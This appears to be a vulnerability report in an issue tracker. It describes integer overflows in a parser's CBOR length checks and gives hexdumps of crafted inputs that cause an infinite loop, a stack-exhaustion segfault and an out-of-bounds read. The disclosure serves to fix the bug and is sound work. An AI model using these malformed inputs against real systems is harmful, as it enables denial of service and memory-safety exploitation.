Integer overflows in CBOR length checks (Leading to DoS)

[DavidBuchanan314]

I've attached a (zipped) test case that illustrates this by triggering an infinite loop in frame header parsing. (it is possible to cause OOB reads too, but an infinite loop provides a more predicable demonstration without invoking any UB)

infinite_loop.zip

$ hexdump -C infinite_loop.bin 
00000000  bb ff ff ff ff ff ff ff  01 7b ff ff ff ff ff ff  |.........{......|
00000010  ff f6                                             |..|
00000012

You can trigger the test case by providing it as --input to assemblersky-harness

[DavidBuchanan314]

Attached are two additional variants that trigger segfaults via a) stack exhaustion b) OOB read

segfaults.zip

$ hexdump -C stack_overflow.bin 
00000000  a1 61 78 bb 00 00 00 00  00 00 00 01 7b ff ff ff  |.ax.........{...|
00000010  ff ff ff ff ee                                    |.....|
00000015
$ hexdump -C oob_read.bin 
00000000  a1 7b ff ff ff fc 00 00  00 06                    |.{........|
0000000a